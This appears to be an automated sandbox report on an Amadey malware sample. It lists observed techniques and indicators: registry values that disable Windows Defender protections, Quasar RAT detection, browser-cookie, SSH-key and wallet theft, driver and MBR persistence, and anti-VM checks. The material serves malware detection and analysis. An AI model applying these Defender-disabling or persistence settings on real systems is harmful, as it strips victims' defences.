amadey | 7d192dbab41057537f86fffa7300579e5f55175914497d8c144790b01af50f6e

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	58424ecd61.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	58424ecd61.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	58424ecd61.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	58424ecd61.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	58424ecd61.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	58424ecd61.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	58424ecd61.exe

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	58424ecd61.exe

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications	58424ecd61.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	58424ecd61.exe

Modifies security service 2 TTPs 2 IoCs

Modify Registry

Windows Service

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/memory/3992-137-0x000000000D0F0000-0x000000000D244000-memory.dmp	family_quasar
behavioral1/memory/3992-138-0x000000000D270000-0x000000000D28A000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 10912 created 2760	10912	MSBuild.exe	49

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	44cdc87f9e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1r83R6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2h3853.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	a1c5de4625.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	58424ecd61.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 5 IoCs

flow	pid	Process
47	3992	powershell.exe
185	3992	powershell.exe
318	3992	powershell.exe
369	3992	powershell.exe
448	3992	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4604	powershell.exe
2180	powershell.exe
2928	powershell.exe
1696	powershell.exe
6320	powershell.exe
2748	powershell.exe
5828	powershell.exe
13272	powershell.exe
12920	powershell.exe
3992	powershell.exe
11760	powershell.exe
6848	powershell.exe
3324	powershell.exe
8664	powershell.exe
8772	powershell.exe
4952	powershell.exe
5476	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 16 IoCs

flow	pid	Process
50	728	rapes.exe
50	728	rapes.exe
50	728	rapes.exe
50	728	rapes.exe
50	728	rapes.exe
327	4652	svchost.exe
386	728	rapes.exe
457	728	rapes.exe
457	728	rapes.exe
457	728	rapes.exe
307	728	rapes.exe
331	728	rapes.exe
395	728	rapes.exe
44	728	rapes.exe
319	728	rapes.exe
33	728	rapes.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\Drivers\367f83e6.sys	c6570e3e.exe
File created	C:\Windows\System32\Drivers\klupd_367f83e6a_arkmon.sys	c6570e3e.exe
File created	C:\Windows\System32\Drivers\klupd_367f83e6a_klbg.sys	c6570e3e.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
5232	netsh.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
3472	icacls.exe
7548	takeown.exe

Sets service image path in registry 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

credential_access stealer

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\CD7Q57q_7840\ImagePath = "\\??\\C:\\Windows\\Temp\\sbkf8KFL_7840.sys"	tzutil.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\367f83e6\ImagePath = "System32\\Drivers\\367f83e6.sys"	c6570e3e.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_367f83e6a_arkmon\ImagePath = "System32\\Drivers\\klupd_367f83e6a_arkmon.sys"	c6570e3e.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_367f83e6a_klbg\ImagePath = "System32\\Drivers\\klupd_367f83e6a_klbg.sys"	c6570e3e.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_367f83e6a_klark\ImagePath = "System32\\Drivers\\klupd_367f83e6a_klark.sys"	c6570e3e.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_367f83e6a_mark\ImagePath = "System32\\Drivers\\klupd_367f83e6a_mark.sys"	c6570e3e.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_367f83e6a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_367f83e6a_arkmon.sys"	c6570e3e.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 8 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
6056	msedge.exe
6416	msedge.exe
6504	msedge.exe
5632	chrome.exe
4500	chrome.exe
1676	chrome.exe
2276	chrome.exe
3656	msedge.exe

Checks BIOS information in registry 2 TTPs 18 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	58424ecd61.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	58424ecd61.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2h3853.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a1c5de4625.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5e4bf76d9c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	44cdc87f9e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	44cdc87f9e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1r83R6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5e4bf76d9c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2h3853.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a1c5de4625.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1r83R6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	261.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	261.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	1r83R6.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Deletes itself 1 IoCs

pid	Process
8032	w32tm.exe

Drops startup file 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8411822f.cmd	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_81f0382b.cmd	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_81f0382b.cmd	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8411822f.cmd	powershell.exe

Executes dropped EXE 30 IoCs

pid	Process
5448	e9T61.exe
2808	1r83R6.exe
728	rapes.exe
4564	2h3853.exe
2376	YGYZCmt.exe
3420	captcha.exe
5320	a1c5de4625.exe
3320	rapes.exe
2984	5e4bf76d9c.exe
4160	b6c719608f.exe
1528	58424ecd61.exe
7276	8938ff0d0d.exe
7480	8e5094a924.exe
4628	YGYZCmt.exe
220	Rm3cVPI.exe
5716	p3hx1_003.exe
7840	tzutil.exe
8032	w32tm.exe
7228	rapes.exe
7044	qWR3lUj.exe
4748	apple.exe
7756	261.exe
7288	261.exe
10844	TbV75ZR.exe
6456	43a434f6.exe
12888	c6570e3e.exe
7432	44cdc87f9e.exe
12216	captcha.exe
8508	7IIl2eE.exe
10760	XOPPRUc.exe

Identifies Wine through registry keys 2 TTPs 8 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	a1c5de4625.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	58424ecd61.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	44cdc87f9e.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	1r83R6.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	2h3853.exe

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs

Safe Mode Boot

T1562.009

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\367f83e6.sys	c6570e3e.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\367f83e6.sys\ = "Driver"	c6570e3e.exe

Loads dropped DLL 25 IoCs

pid	Process
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe
12888	c6570e3e.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
7548	takeown.exe
3472	icacls.exe

Reads ssh keys stored on the system 2 TTPs
Tries to access SSH used by SSH programs.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 2 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	58424ecd61.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	58424ecd61.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\58424ecd61.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10416770101\\58424ecd61.exe"	rapes.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\42bdb713-0053-4a10-9bb0-c040d5ebd6b9 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{6de22b4c-aeec-4d5a-ae91-5a30501945f4}\\42bdb713-0053-4a10-9bb0-c040d5ebd6b9.cmd\""	c6570e3e.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	file.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	e9T61.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a1c5de4625.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10416740101\\a1c5de4625.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5e4bf76d9c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10416750101\\5e4bf76d9c.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b6c719608f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10416760101\\b6c719608f.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 3 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\F:	captcha.exe
File opened (read-only)	\??\F:	c6570e3e.exe
File opened (read-only)	\??\F:	captcha.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	c6570e3e.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x00050000000235e4-367.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 38 IoCs

discovery

Process Discovery

T1057

pid	Process
7000	tasklist.exe
5368	tasklist.exe
2072	tasklist.exe
6828	tasklist.exe
9688	tasklist.exe
6048	tasklist.exe
2652	tasklist.exe
4688	tasklist.exe
3168	tasklist.exe
11416	tasklist.exe
11808	tasklist.exe
12940	tasklist.exe
2172	tasklist.exe
4532	tasklist.exe
8348	tasklist.exe
9172	tasklist.exe
12724	tasklist.exe
4432	tasklist.exe
5628	tasklist.exe
8608	tasklist.exe
10972	tasklist.exe
5456	tasklist.exe
5128	tasklist.exe
7664	tasklist.exe
2652	tasklist.exe
4256	tasklist.exe
624	tasklist.exe
5780	tasklist.exe
3084	tasklist.exe
6368	tasklist.exe
11284	tasklist.exe
5344	tasklist.exe
4540	tasklist.exe
2620	tasklist.exe
8320	tasklist.exe
3516	tasklist.exe
11644	tasklist.exe
6772	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
2808	1r83R6.exe
728	rapes.exe
4564	2h3853.exe
5320	a1c5de4625.exe
3320	rapes.exe
1528	58424ecd61.exe
7228	rapes.exe
7432	44cdc87f9e.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 2376 set thread context of 4292	2376	YGYZCmt.exe	107
PID 7276 set thread context of 7336	7276	8938ff0d0d.exe	315
PID 4628 set thread context of 5460	4628	YGYZCmt.exe	324
PID 7044 set thread context of 5856	7044	qWR3lUj.exe	447
PID 10844 set thread context of 10912	10844	TbV75ZR.exe	520
PID 10760 set thread context of 10796	10760	XOPPRUc.exe	587

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	43a434f6.exe
File opened (read-only)	\??\VBoxMiniRdrDN	c6570e3e.exe

Drops file in Windows directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File created	C:\Windows\Tasks\rapes.job	1r83R6.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe

Hide Artifacts: Ignore Process Interrupts 1 TTPs 3 IoCs

Command interpreters often include specific commands/flags that ignore errors and other hangups.

persistence privilege_escalation

Ignore Process Interrupts

T1564.011

pid	Process
5476	powershell.exe
3324	powershell.exe
8772	powershell.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
6036	sc.exe
7336	sc.exe
4576	sc.exe
5176	sc.exe
9736	sc.exe
4152	sc.exe
5828	sc.exe
9088	sc.exe
9148	sc.exe
9296	sc.exe
9360	sc.exe
9392	sc.exe
5044	sc.exe
696	sc.exe
9452	sc.exe
2652	sc.exe
3964	sc.exe
7492	sc.exe
5368	sc.exe
8680	sc.exe
9196	sc.exe
9496	sc.exe
9584	sc.exe
8868	sc.exe
6408	sc.exe
8752	sc.exe
5956	sc.exe
7280	sc.exe
988	sc.exe
8784	sc.exe
9256	sc.exe
9632	sc.exe
7920	sc.exe
8224	sc.exe
8848	sc.exe
8928	sc.exe
8976	sc.exe
9044	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 5 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	c6570e3e.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	c6570e3e.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
11452	10912	WerFault.exe	520

System Location Discovery: System Language Discovery 1 TTPs 41 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	file.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8e5094a924.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	p3hx1_003.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	44cdc87f9e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e9T61.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1r83R6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a1c5de4625.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	b6c719608f.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	b6c719608f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c6570e3e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	58424ecd61.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	43a434f6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2h3853.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b6c719608f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 28 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe
